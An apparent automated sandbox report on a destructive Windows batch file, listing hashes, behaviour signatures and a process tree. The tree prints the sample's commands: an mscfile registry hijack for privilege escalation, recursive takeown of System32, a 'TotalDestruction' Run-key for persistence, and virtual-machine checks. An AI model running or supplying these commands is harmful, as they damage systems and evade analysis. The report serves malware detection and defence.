Analysis
- max time kernel: 146s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 08/09/2024, 06:47
Static task
- static1

Behavioral tasks
- behavioral1: sample custom.bat, resource win10-20240404-en
- behavioral2: sample custom.bat, resource win7-20240903-en
- behavioral3: sample custom.bat, resource win10v2004-20240802-en
- behavioral4: sample custom.bat, resource win11-20240802-en
General
- Target: custom.bat
- Size: 4KB
- MD5: 1c63745d54962d205bb3ae879bea1ed4
- SHA1: a832c894a4e2b6d486c48b9ea6ec79d94df9537e
- SHA256: 396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
- SHA512: 129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
- SSDEEP: 96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Signatures

Modifies file permissions (1 TTPs, 2 IoCs)
  pid   Process
  288   takeown.exe
  2036  takeown.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                                   Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"  reg.exe

Enumerates processes with tasklist (1 TTPs, 2 IoCs)
  pid   Process
  1300  tasklist.exe
  1328  tasklist.exe

Command and Scripting Interpreter: PowerShell (1 IoCs; signature name recovered from the process tree below, where PID 2712 carries this tag)
  pid   Process
  2712  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (2 IoCs)
  pid   Process
  108   timeout.exe
  1756  timeout.exe

Gathers system information (1 TTPs, 3 IoCs)
  Runs systeminfo.exe.
  pid   Process
  1768  systeminfo.exe
  560   systeminfo.exe
  684   systeminfo.exe

Modifies registry class (9 IoCs)
  description      ioc                                                                                          Process
  Key created      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile                  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell            reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open       reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open       reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile                  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell            reg.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2712  powershell.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description                      pid   Process
  Token: SeDebugPrivilege          2712  powershell.exe
  Token: SeTakeOwnershipPrivilege  288   takeown.exe
  Token: SeDebugPrivilege          1300  tasklist.exe
  Token: SeDebugPrivilege          1328  tasklist.exe
  Token: SeTakeOwnershipPrivilege  2036  takeown.exe

Suspicious use of WriteProcessMemory (60 IoCs; 20 distinct parent/child pairs, each reported three times)
  description                        pid   Process  procid_target
  PID 2080 wrote to memory of 2692   2080  cmd.exe  31
  PID 2080 wrote to memory of 2712   2080  cmd.exe  32
  PID 2080 wrote to memory of 108    2080  cmd.exe  34
  PID 2080 wrote to memory of 2060   2080  cmd.exe  35
  PID 2080 wrote to memory of 568    2080  cmd.exe  36
  PID 2080 wrote to memory of 1756   2080  cmd.exe  37
  PID 568 wrote to memory of 288     568   cmd.exe  39
  PID 2080 wrote to memory of 2332   2080  cmd.exe  40
  PID 2080 wrote to memory of 684    2080  cmd.exe  41
  PID 2080 wrote to memory of 1912   2080  cmd.exe  42
  PID 2080 wrote to memory of 1768   2080  cmd.exe  45
  PID 2080 wrote to memory of 908    2080  cmd.exe  46
  PID 2080 wrote to memory of 560    2080  cmd.exe  47
  PID 2080 wrote to memory of 1836   2080  cmd.exe  48
  PID 2080 wrote to memory of 1300   2080  cmd.exe  49
  PID 2080 wrote to memory of 2416   2080  cmd.exe  50
  PID 2080 wrote to memory of 1328   2080  cmd.exe  51
  PID 2080 wrote to memory of 1084   2080  cmd.exe  52
  PID 2080 wrote to memory of 1772   2080  cmd.exe  53
  PID 2080 wrote to memory of 2036   2080  cmd.exe  54
Processes

- C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
  PID: 2080
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\mode.com
    mode con: cols=800 lines=60
    PID: 2692
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
    PID: 2712
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\timeout.exe
    timeout /t 5
    PID: 108
    - Delays execution with timeout.exe
  - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
    PID: 2060
    - Modifies registry class
  - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
    PID: 568
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\* /r /d y
      PID: 288
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\timeout.exe
    timeout /t 5
    PID: 1756
    - Delays execution with timeout.exe
  - C:\Windows\system32\reg.exe
    reg delete "HKCU\Software\Classes\mscfile" /f
    PID: 2332
    - Modifies registry class
  - C:\Windows\system32\systeminfo.exe
    systeminfo
    PID: 684
    - Gathers system information
  - C:\Windows\system32\findstr.exe
    findstr /i "VirtualBox"
    PID: 1912
  - C:\Windows\system32\systeminfo.exe
    systeminfo
    PID: 1768
    - Gathers system information
  - C:\Windows\system32\findstr.exe
    findstr /i "VMware"
    PID: 908
  - C:\Windows\system32\systeminfo.exe
    systeminfo
    PID: 560
    - Gathers system information
  - C:\Windows\system32\findstr.exe
    findstr /i "Hyper-V"
    PID: 1836
  - C:\Windows\system32\tasklist.exe
    tasklist
    PID: 1300
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\findstr.exe
    findstr /i "vmsrvc.exe"
    PID: 2416
  - C:\Windows\system32\tasklist.exe
    tasklist
    PID: 1328
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\findstr.exe
    findstr /i "VBoxService.exe"
    PID: 1084
  - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
    PID: 1772
    - Adds Run key to start application
  - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    PID: 2036
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
Downloads
- Filesize: 285B
- MD5: 4577f08330df24a350ff523ec87bf38e
- SHA1: 5bd1a1b1b8ca3b007102a75f7abaf72348955cf2
- SHA256: 5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
- SHA512: ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2